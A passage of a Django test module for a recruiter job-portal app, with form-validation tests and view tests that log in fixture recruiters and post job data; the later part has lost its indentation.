    setUp creates the minimal reference rows (user, location chain,
    industry, skill, functional area, qualification) a job post needs,
    plus an uploaded logo file.
    """

    def setUp(self):
        self.user = User.objects.create(username='micro_test')
        # Location chain: country -> state -> city.
        self.country = Country.objects.create(name="India")
        self.state = State.objects.create(
            name='Telangana', country_id=self.country.id)
        self.city = City.objects.create(
            name='hyderabad', state_id=self.state.id)
        self.industry = Industry.objects.create(name="Software")
        self.skill = Skill.objects.create(name='Python')
        self.functional_area = FunctionalArea.objects.create(
            name='functional_area')
        self.qualification = Qualification.objects.create(name='btech')
        # Fix: the original opened the file and never closed it, leaking
        # a descriptor per test. SimpleUploadedFile only needs the bytes,
        # so read within a context manager and let the handle close.
        with open('static/img/report.png', 'rb') as upload_file:
            self.file_dict = SimpleUploadedFile(upload_file.name,
                                                upload_file.read())

    def test_job_post_for_valid(self):
        # A fully-populated payload must validate.
        form = JobPostForm(data={'title': 'java developer',
                                 'job_role': 'developer',
                                 'functional_area': [self.functional_area.id],
                                 'vacancies': 1, 'description': 'swetha',
                                 'min_year': 1, 'max_year': 1, 'min_month': 2,
                                 'max_month': 2, 'fresher': True,
                                 'edu_qualification': [self.qualification.id],
                                 'visa_required': True,
                                 'visa_country': self.country.id,
                                 'visa_type': 'Permanent', 'skills': [self.skill.id],
                                 'min_salary': 1000, 'max_salary': 1200,
                                 'company_address': 'abc', 'company_name': 'abc',
                                 'company_website': 'http://abc.com',
                                 'company_logo': self.file_dict,
                                 'company_description': 'abc', 'last_date': '12/10/2024',
                                 "job_type": "Internship", 'location': [self.city.id],
                                 'industry': [self.industry.id],
                                 'final_industry': 'hello', 'final_skills': 'dcd',
                                 'final_functional_area': 'fa',
                                 'final_edu_qualification': 'dcs',
                                 'published_date': '12/10/2024 00:00:00',
                                 'salary_type': 'Year', 'published_message': 'hellooo'},
                           user=self.user)
        self.assertTrue(form.is_valid())

    def test_job_post_form_invalid(self):
        # Missing required fields (e.g. title/company data) must fail.
        form = JobPostForm(data={'user': self.user.id,
                                 'job_role': 'developer',
                                 'functional_area': self.functional_area.id,
                                 'vacancies': 1, 'keywords': '',
                                 'description': 'swetha',
                                 'min_year': 1, 'max_year': 1,
                                 'min_month': 2, 'max_month': 2,
                                 'qualification': [self.qualification.id],
                                 'fresher': True, 'visa_required': True,
                                 'visa_country': self.country.id,
                                 'visa_type': 'Permanent',
                                 'skills': [self.skill.id],
                                 'min_salary': 1000, 'max_salary': 1200,
                                 'last_date': '2015-07-24',
                                 'posted_on': '2015-07-06 18:01:59.826458+05:30',
                                 'created_on': '2015-07-06 18:01:59.826458+05:30',
                                 'status': 'Draft', 'previous_status': 'Draft',
                                 'post_on_fb': True, 'post_on_ln': True, "post_on_tw": True,
                                 "fb_views": '10', "tw_views": '10', "ln_views": '10',
                                 "other_views": "10", "job_type": "Permanent",
                                 'location': [self.city.id], 'industry': self.industry.id,
                                 'final_industry': 'hello',
                                 'final_skills': 'dcd', 'final_functional_area': 'fa',
                                 'final_edu_qualification': 'dcs',
                                 'salary_type': 'Year'},
                           user=self.user)
        self.assertFalse(form.is_valid())
class recruiter_Views_test(TestCase):
    """Fixture scaffold for recruiter view tests.

    Only defines setUp (no test methods visible here): creates an active
    user and the shared reference rows other tests also build.
    """

    def setUp(self):
        # NOTE(review): password is assigned raw, not via set_password —
        # fine as long as no test authenticates with it; confirm if login
        # tests are added.
        self.user = User.objects.create(
            email='testuser@mp.com', password='test', is_active=True)
        # Location chain: country -> state -> city.
        self.country = Country.objects.create(name="India")
        self.state = State.objects.create(
            name='Telangana', country_id=self.country.id)
        self.city = City.objects.create(
            name='hyderabad', state_id=self.state.id)
        self.industry = Industry.objects.create(name="Software")
        self.skill = Skill.objects.create(name='Python')
        self.functional_area = FunctionalArea.objects.create(
            name='functional_area')
        self.qualification = Qualification.objects.create(name='btech')
class company_form_test(TestCase):
    """Validation tests for Company_Form."""

    def setUp(self):
        self.user = User.objects.create(username='micro_test')

    def test_company_for_valid(self):
        # A complete company payload must validate.
        form = Company_Form(data={'name': 'company123', 'email': 'company123@gmail.com',
                                  'short_code': 'comp123', 'website': 'https://micropyramid.com',
                                  'phone_number': '9876543210', 'company_type': 'Company'})
        self.assertTrue(form.is_valid())

    def test_company_form_invalid(self):
        # Blank name/website/phone_number must fail validation.
        form = Company_Form(data={'name': '',
                                  'email': 'company123@gmail.com',
                                  'short_code': 'comp123',
                                  'website': '',
                                  'phone_number': ''})
        self.assertFalse(form.is_valid())
class user_form_test(TestCase):
    """Validation tests for User_Form."""

    def setUp(self):
        self.user = User.objects.create(username='micro_test')

    def test_company_for_valid(self):
        # Full payload including client_type and username must validate.
        form = User_Form(
            data={'password': 'Mp1234@', 'email': 'company123@gmail.com',
                  'mobile': '9876543210', 'client_type': 'Consultant', 'username': 'myname'})
        self.assertTrue(form.is_valid())

    def test_company_form_invalid(self):
        # 9-digit mobile number is rejected.
        form = User_Form(
            data={'password': 'Mp1234@', 'email': 'company123@gmail.com', 'mobile': '987654321'})
        self.assertFalse(form.is_valid())
        # Empty mobile number is rejected.
        form = User_Form(
            data={'password': 'Mp1234@', 'email': 'company123@gmail.com', 'mobile': ''})
        self.assertFalse(form.is_valid())
class change_password_form_test(TestCase):
    """Validation tests for ChangePasswordForm."""

    def setUp(self):
        self.user = User.objects.create(username='micro_test')
        # Hash the password properly so the form's old-password check works.
        self.user.set_password('mp')
        self.user.save()

    def test_change_password_for_valid(self):
        # Correct old password with matching new/retype must validate.
        form = ChangePasswordForm(
            data={'oldpassword': 'mp', 'newpassword': 'mp123', 'retypepassword': 'mp123'},
            user=self.user)
        self.assertTrue(form.is_valid())

    def test_change_password_form_invalid(self):
        # Missing retype must fail validation.
        form = ChangePasswordForm(
            data={'oldpassword': 'mp', 'newpassword': 'mp123', 'retypepassword': ''},
            user=self.user)
        self.assertFalse(form.is_valid())
class personal_info_form_test(TestCase):
    """Validation tests for PersonalInfoForm."""

    def setUp(self):
        self.user = User.objects.create(username='micro_test')
        self.country = Country.objects.create(name="India")
        self.state = State.objects.create(
            name='Telangana', country_id=self.country.id)
        self.city = City.objects.create(
            name='hyderabad', state_id=self.state.id)
        self.industry = Industry.objects.create(name="Software")
        self.skill = Skill.objects.create(name='Python')
        self.functional_area = FunctionalArea.objects.create(
            name='functional_area')
        self.qualification = Qualification.objects.create(name='btech')

    def test_personal_info_for_valid(self):
        """A complete payload plus a profile picture should validate."""
        # Fix: close the fixture image after reading instead of leaking
        # the file handle (the original used a bare open() with no close()).
        with open('static/img/report.png', 'rb') as upload_file:
            file_dict = {'profile_pic': SimpleUploadedFile(
                upload_file.name, upload_file.read())}
        data = {'username': 'mp', 'first_name': 'micropyramid', 'last_name': 'mp',
                'name': 'micro', 'city': self.city.id, 'state': self.state.id,
                'country': self.country.id, 'industry': [self.industry.id],
                'functional_area': [self.functional_area.id],
                'technical_skills': [self.skill.id], 'nationality': self.country.id,
                'year': '2016', 'month': '06', 'profile_description': 'hello',
                'job_role': 'developer', 'mobile': '9876543210',
                'company_type': 'general', 'user_id': self.user.id}
        form = PersonalInfoForm(data, file_dict)
        self.assertTrue(form.is_valid())

    def test_personal_info_form_invalid(self):
        """A malformed mobile number (and no picture) should fail."""
        form = PersonalInfoForm(data={'username': 'mp', 'first_name': 'micropyramid',
                                      'last_name': 'mp', 'name': 'micro',
                                      'city': self.city.id, 'state': self.state.id,
                                      'country': self.country.id,
                                      'industry': [self.industry.id],
                                      'functional_area': [self.functional_area.id],
                                      'technical_skills': [self.skill.id],
                                      'nationality': self.country.id,
                                      'year': '2016', 'month': '06',
                                      'profile_description': 'hello',
                                      'job_role': 'developer', 'mobile': '901074',
                                      'user_id': self.user.id})
        self.assertFalse(form.is_valid())
class mobile_verify_form_test(TestCase):
    """Validation tests for MobileVerifyForm."""

    def test_mobile_verify_form_valid(self):
        # Fix: renamed from the copy-pasted 'test_change_password_for_valid'
        # so the name reflects the form under test.
        form = MobileVerifyForm(data={'mobile_verification_code': 'mp'})
        self.assertTrue(form.is_valid())

    def test_mobile_verify_form_invalid(self):
        # Fix: renamed from 'test_change_password_form_invalid' (copy-paste).
        form = MobileVerifyForm(data={'mobile_verification_code': ''})
        self.assertFalse(form.is_valid())
class mail_template_form_test(TestCase):
    """Validation tests for MailTemplateForm."""

    def test_mail_template_for_valid(self):
        payload = {'subject': 'mp', 'message': 'message', 'title': 'title'}
        self.assertTrue(MailTemplateForm(data=payload).is_valid())

    def test_mail_template_form_invalid(self):
        # A blank title must fail validation.
        payload = {'subject': 'mp', 'message': 'message', 'title': ''}
        self.assertFalse(MailTemplateForm(data=payload).is_valid())
class menu_form_test(TestCase):
    """Validation tests for MenuForm."""

    def test_menu_form_for_valid(self):
        payload = {'title': 'mp', 'url': 'https://micropyramid.com'}
        self.assertTrue(MenuForm(data=payload).is_valid())

    def test_menu_form_invalid(self):
        # Blank title and url must fail validation.
        payload = {'title': '', 'url': ''}
        self.assertFalse(MenuForm(data=payload).is_valid())
class recruiter_form_test(TestCase):
    """Validation tests for RecruiterForm."""

    def test_recruiter_form_for_valid(self):
        form = RecruiterForm(
            data={'mobile': '8977455970', 'email': 'nikhila@micropyramid.com',
                  'job_role': 'developer', 'first_name': 'nikhila',
                  'password': 'Mp1234@'})
        self.assertTrue(form.is_valid())

    def test_recruiter_form_for_valid_data(self):
        # Fix: removed the stray debug `print(form.errors)` that was left
        # in front of the assertion.
        form = RecruiterForm(
            data={'mobile': '9101010747', 'email': 'nikhila@micropyramid.com',
                  'job_role': 'developer', 'first_name': 'nikhila',
                  'password': 'Mp1234@'})
        self.assertTrue(form.is_valid())

    def test_recruiter_form_invalid(self):
        # A 5-digit mobile and empty required fields must fail validation.
        form = RecruiterForm(
            data={'mobile': '12345', 'email': '', 'job_role': '',
                  'profile_pic': '', 'first_name': ''})
        self.assertFalse(form.is_valid())
class edit_companyform_test(TestCase):
    """Validation tests for EditCompanyForm."""

    def test_edit_company_form_for_valid(self):
        form = EditCompanyForm(
            data={'name': 'testingcompany',
                  'company_type': 'Company',
                  'website': 'https://testingcompany.com',
                  'profile': 'testingcompany', 'address': 'hyd',
                  'level': '1'})
        self.assertTrue(form.is_valid())

    def test_edit_company_form_invalid(self):
        # Blank profile/address/level must fail validation.
        # Fix: the original contained this exact test a second time under
        # the misleading name 'test_edit_company_form_for_valid_data'
        # (it asserted is_valid() is False); the duplicate was removed.
        form = EditCompanyForm(
            data={'name': 'testingcompany', 'company_type': 'Company',
                  'website': 'https://testingcompany.com', 'profile': '',
                  'address': '', 'level': ''})
        self.assertFalse(form.is_valid())
class recruiter_get_views_test(TestCase):
def setUp(self):
self.company = Company.objects.create(
name='testing', website='testingsite.com', is_active=True, company_type='Consultant')
self.recruiter = User.objects.create(
email='recruiter@mp.com', username="recruiter", user_type='AA', is_active=True,
mobile_verified=True, company=self.company, is_admin=True, agency_admin=True)
self.recruiter.set_password('mp')
self.recruiter.save()
self.recruiter_mobile_not_verified = User.objects.create(
email='recruiter_mobile@mp.com', username="recruiter_mobile", user_type='RR',
is_active=True, mobile_verified=False, mobile_verification_code='123456',
company=self.company)
self.inactive_recruiter = User.objects.create(
email='inactive_recruiter@mp.com', username="inactive_recruiter", user_type='RR',
is_active=True, mobile_verified=False, mobile_verification_code='123456',
company=self.company)
self.recruiter_mobile_not_verified.set_password('mp')
self.recruiter_mobile_not_verified.save()
self.inactive_recruiter.set_password('mp')
self.inactive_recruiter.save()
self.company_recruiter = User.objects.create(
email='testing@mp.com', username='testing', user_type='RR', company=self.company,
is_active=True, mobile_verified=True)
self.company_recruiter.set_password('mp')
self.company_recruiter.save()
self.country = Country.objects.create(name="India")
self.agency_company = AgencyCompany.objects.create(
name='testing', website='testing.com', decription='hello', company=self.company,
created_by=self.recruiter)
self.agency_category = AgencyCompanyCatogery.objects.create(
name="junior", percantage='1')
self.state = State.objects.create(
name='Telangana', country_id=self.country.id)
self.city = City.objects.create(
name='hyderabad', state_id=self.state.id)
self.industry = Industry.objects.create(name="Software")
self.skill = Skill.objects.create(name='Python')
self.functional_area = FunctionalArea.objects.create(
name='functional_area')
self.qualification = Qualification.objects.create(name='btech')
self.current_date = datetime.strptime(
str(datetime.now().date()), "%Y-%m-%d").strftime("%m/%d/%Y")
self.walk_in_from_date = '06/24/2016'
self.walk_in_to_date = '06/24/2026'
for each in range(0, 15):
self.jobpost = JobPost.objects.create(user=self.recruiter,
title='test-jobpost_'+str(each),
vacancies='6', description='job post description',
job_type='Full_Time',
status='Draft', published_message='test message',
company_address='company address',
company_description='company description',
last_date='2016-09-09')
self.interview_location = InterviewLocation.objects.create(
venue_details='hyderabad, India', latitude='14.8976',
longitude='21.0967')
self.jobpost.job_interview_location.add(self.interview_location)
self.jobpost.skills.add(self.skill)
self.jobpost.industry.add(self.industry)
self.jobpost.functional_area.add(self.functional_area)
self.jobpost.location.add(self.city)
FacebookPost.objects.create(
job_post=self.jobpost, page_or_group='Page',
page_or_group_id='1305678', post_id='8764567', post_status='Posted')
FacebookPost.objects.create(
job_post=self.jobpost, page_or_group='Group',
page_or_group_id='1305678', post_id='8764567', post_status='Posted')
# TwitterPost.objects.create(job_post=self.jobpost, page_or_profile='Profile', post_id='126789', post_status='Posted')
self.other_edu = ['[{"other_edu_qualification_1":"h"}]']
self.fa = ['[{"other_functional_area_1":"ot"}]']
self.other_ind = ['[{"other_industry_name_1":"hello industry"}]']
self.other_skill = ['[{"other_skill_name_1":"test skill"}]']
upload_file = open('static/img/report.png', 'rb')
self.file_dict = SimpleUploadedFile(upload_file.name, upload_file.read())
def test_views_with_employee(self):
response = self.client.get(
reverse('recruiter:account_activation', kwargs={'user_id': '100'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_views_with_employee_login(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get('/recruiter/')
self.assertEqual(response.status_code, 302)
response = self.client.get('/recruiter/job/list/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/list.html')
response = self.client.get('/recruiter/job/list/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/list.html')
response = self.client.get(reverse('recruiter:profile'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/user/profile.html')
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/recruiter/job/internship/new/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/new.html')
response = self.client.get('/recruiter/job/walk-in/new/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/new.html')
response = self.client.get('/recruiter/change-password/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/user/change_password.html')
response = self.client.get('/recruiter/thank-you-message/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/registration_success.html')
response = self.client.get('/recruiter/how-it-works/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/how_it_works.html')
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'salary_type': 'Year',
'min_salary': '123',
'max_salary': '1234',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': ['[{"other_industry_name_1":"h"}]'],
'final_skills': ['[{"other_skill_name_1":"test"}]'],
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id], 'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'no_of_interview_location': '0',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '', 'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'salary_type': 'Year',
'min_salary': '1', 'max_salary': '3',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '', 'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '2',
'final_location_1': ['[13.1543, 77.783]'],
'final_location_2': [''],
'venue_details_2': [''],
'venue_details_1': 'mp',
'show_location_1': 'False',
'show_location_2': 'True',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'published_message':'hellooo', })
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '1',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0',
'max_year': '1',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22','published_message':'hellooo' })
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22', 'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': ['1'],
'visa_type': ['hello'],
'published_message':'hellooo',
'salary_type': 'Year'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'salary_type': 'Month',
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'], 'visa_country': ['1'],
'visa_type': ['hello'],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'published_message':'hellooo',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'published_message':'hellooo',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'published_message': 'hellooo',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
def test_new_job_with_mobile_not_verified(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_edit_job_with_mobile_not_verified(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': '1'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_edit_job_with_mobile_verified(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
self.job_post = JobPost.objects.all()
self.job_post_id = self.job_post.first().id
self.edit_url = reverse('recruiter:edit', kwargs={'job_post_id': self.job_post.first().id})
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': '250'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': self.job_post.first().id}))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/edit.html')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'visa_required': ['True'],
'visa_country': ['self.country.id'],
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '2', 'max_month': '1',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'salary_type': 'Year',
'published_message':'hellooo'}
)
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
expected_errors = {'error': True,
'response':
{'visa_country':
['Select a valid choice. That choice is not one of the available choices.']}}
self.assertEqual(error_data, expected_errors)
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'min_year': '0', 'max_year': '1',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'job_type': 'full-time',
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'min_salary': '1000', 'max_salary': '2000',
'no_of_interview_location': '2',
'final_location_1': ['[13.1543, 77.783]'],
'final_location_2': ['[13.1543, 77.783]'],
'venue_details_2': 'hyd',
'venue_details_1': 'mp',
'show_location_1': 'False',
'salary_type': 'Year',
'show_location_2': 'True',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id],
'published_message':'hellooo'
})
self.assertEqual(response.status_code, 200)
error_data = json.loads(str(response.content, encoding='utf-8'))
self.assertEqual(error_data['response'], 'Jobpost Updated Successfully')
response = self.client.post(self.edit_url,
data={'title': 'test-job-post',
'job_type': 'Walk-in',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
